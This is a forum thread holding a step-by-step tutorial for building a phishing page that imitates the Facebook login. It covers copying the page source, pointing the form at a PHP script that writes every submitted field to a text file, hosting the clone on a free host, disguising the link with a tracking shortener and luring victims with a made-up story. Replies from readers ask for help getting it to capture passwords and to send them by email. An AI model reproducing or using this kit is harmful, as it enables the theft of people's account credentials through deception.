Forum Thread: Make a Phishing Page for Harvesting Credentials Yourself

This is my first tutorial/how-to on this website so do not be mean with me. I will try to keep it as simple as it is.

Step 1: Choosing a Website

First, you have to choose the website you want the credentials for. It could either be Facebook, Yahoo, Gmail, Youtube etc. For the sake of this tutorial I am going to go with Facebook.

Step 2: Extract the Source Code

Great! You chose your website, now you have to get the login's page source code. I do not know if this sounds scary or not, but it is very simple. You just have to right click anywhere on the page then click View Page Source.

Then just copy all of it(Ctrl+A Ctrl+C) and paste it in a notepad, and save it as anything.htm.

!YOU MUST SET THE SET AS TYPE TO ALL FILES OR THERE IS A CHANCE IT WILL NOT WORK!

Step 3: Modifying the Source Code

This is the hardest part because you have to find and modify some things in the notepad you just created, but there is a complete mess. You can use Ctrl+F to help you navigate. First search for

action="facebook.com/login.php?login_attempt=1 " Without the brackets at the start and end

there is a chance it will be a bit more to it so I would suggest searching for action= , then looking for something that looks like this.

Delete everything that is between the quotes and you should have something like this

action=""

Now just type post.php between the quotes so it will become

action="post.php"

Step 4: Creating the Actual Script

Maybe you were wondering why did we put post.php in the code there?
We did that so when someone will actually click the Submit button, the site will execute our script written in post.php
But we still do not have a post.php, so we have to create one. Just open another notepad, and paste this script in

_<?php
header ('Location:-The site you are using- ');
$handle = fopen('usernames.txt', 'a');
foreach($_POST as $variable => $value) {
fwrite($handle, $variable);
fwrite($handle, '=');
fwrite($handle, $value);
fwrite($handle, 'rn');
}
fwrite($handle, 'rn');
fclose($handle);
exit;
?> _

Make sure to change -The site you are using to the site you are using- how you copy it from the page(with http or https) to whatever site you are using.

Save the file as post.php with type set to all files, then we are almost ready to go.

Step 5: Uploading Your Files to a Host

Now you have created 2 pages: the site mirror one and the script one

Note: You can open your site mirror with a browser to make sure everything is ok. If there is anything wrong, start over and make sure to follow my steps carefuly

You now just have to upload them to a webhost so other people can access them too

I will use 000webhost.com because it is a free host with an easy to understand interface
Just create an account, then create a site. Follow their steps, it is very simple

After you created a site, It will ask you to create one website with their templates, a wordpress one, or if you are advanced they have an option for you too.

But now you have to go to file manager and click upload files now

It will redirect you to your site's directory tree
Just click public_html on the left hand side.
Then on the right, press the button that looks like an arrow pointing into an cloud and says Upload files

Now you just have to select the 2 files from your computer(anyname.htm and post.php).
After that, right click on the htm file and click View
This is your site, that people can access over the internet from anywhere in the world.

You can give it a test by entering any credentials and the trying to log in
It will create a new file in the public_html called usernames.txt
You can read it the same way you opened you site, by right clicking and clicking View
After every try and every person you have to delete the file usernames.txt

Step 6: (OPTIONAL) Making Your URL More Attractive

Let's be honest, no one is going to click on a link that says www.000webhost-sitename-.com and then enter their credentials on a facebook page

To get the link to the page view the page you created and copy the url

You can make it prettier in many ways, but I like using grabify.link as it gives me more data about the user that clicked it

Step 7: Sharing Your URL and Harvesting the Results

Now you just have to send the link to someone and wait for them to log in.
You can add a story to it, a video to check out, I don't know, just get creative.

After the victim logged in on your page, you just open the file usernames.txt and at the start of the first line you should see the credentials

Now you just got the credentials for the site you wanted, my fellow hackers, go on and have fun, but don't use this to hurt other people because it could get you in trouble

I'm sorry if you can see a picture somewhere in the last step or so but I was going to use it and then changed my mind and I can't seem to remove it

8 Responses

i have a problem here ;p

Ive done all the steps, but when i try to test it by typing a gmail and password in the fake facebook page and press 'Log In' I get "Parse error: syntax error, unexpected ':', expecting ',' or ')' in /storage/ssd4/571/15724571/public_html/post.php on line 2" as a redirect and when i check my my .txt file i don't see the user password only email'id is shown.

use double qoutes in header location and single qoutes on other
it works for me....give it a try

i have just the same issue.

i am unable to get passowrd. just as explained earlier by
UCHIHA SASUKE

How do I make the details sent to my gmail address instead of the post.html

I can't find the action= when I search for it
Plz help

Share Your Thoughts

  • Hot
  • Active